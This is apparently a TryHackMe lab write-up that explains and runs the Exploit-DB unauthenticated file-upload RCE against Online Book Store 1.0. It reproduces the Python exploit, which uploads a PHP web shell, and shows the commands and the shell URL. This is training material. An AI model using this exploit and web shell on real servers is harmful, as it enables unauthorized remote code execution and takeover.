# Exploit Vulnerabilities
###### tags: `tryhackme`
[TOC]
## Gathering Information
ip 10.10.167.176
### Nmap

Open the web application in a browser:
```bash
firefox 10.10.20.249:80
```
The name and version number of the application are shown on the page:
-> Online Book Store v1.0
### Exploit-DB

https://www.exploit-db.com/exploits/47887 (Online Book Store 1.0 - Unauthenticated Remote Code Execution)

The script uses the argparse module to handle its command-line arguments; the only one is the target URL:
```python
import argparse

parser = argparse.ArgumentParser()
parser.add_argument('url', action='store', help='The URL of the target.')
args = parser.parse_args()
```
It generates a random 10-character file name, which becomes the name of the PHP web shell, and builds a one-line PHP payload that runs whatever command is passed in the `cmd` query parameter and echoes the output:
```python
import random
import string

random_file = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(10))
payload = '<?php echo shell_exec($_GET[\'cmd\']); ?>'
# The file part of the multipart upload: form field 'image', a .php file name, the shell as content.
file = {'image': (random_file + '.php', payload, 'text/php')}
```
It then uses the requests module to send the HTTP request: a POST that uploads the web shell through the application's admin_add.php page, together with the form field `add=1`:
```python
import requests

url = args.url.rstrip('/')
# verify=False disables TLS certificate checking, so the exploit also works against HTTPS targets with self-signed certs.
r = requests.post(url + '/admin_add.php', files=file, data={'add':'1'}, verify=False)
print('> Verifying shell upload...')
```
The uploaded file is then reachable under /bootstrap/img/<random name>.php, which is what the verification step and the RCE rely on.
## Exploit Vulnerability
The vulnerability is an unauthenticated arbitrary file upload: admin_add.php accepts a `.php` file in its `image` field without a login, stores it under /bootstrap/img/, and the web server executes it when it is requested directly, which gives remote code execution.
### Exploit Flow
Save the exploit locally and install its only dependency, the `requests` module (the Debian/Kali package that provides pip is `python3-pip`):
```bash
nano exploitRCE.py        # paste the Exploit-DB script
apt install python3-pip
pip install requests
```
Check the usage, then run it against the target's base URL:
```bash
python3 exploitRCE.py -h
python3 exploitRCE.py http://10.10.20.249
```

The shell ends up under /bootstrap/img/ with the random name the script generated; requesting it with a `cmd` parameter runs that command on the target, which is the RCE:

http://10.10.20.249/bootstrap/img/MQVnWWS3cb.php?cmd=whoami
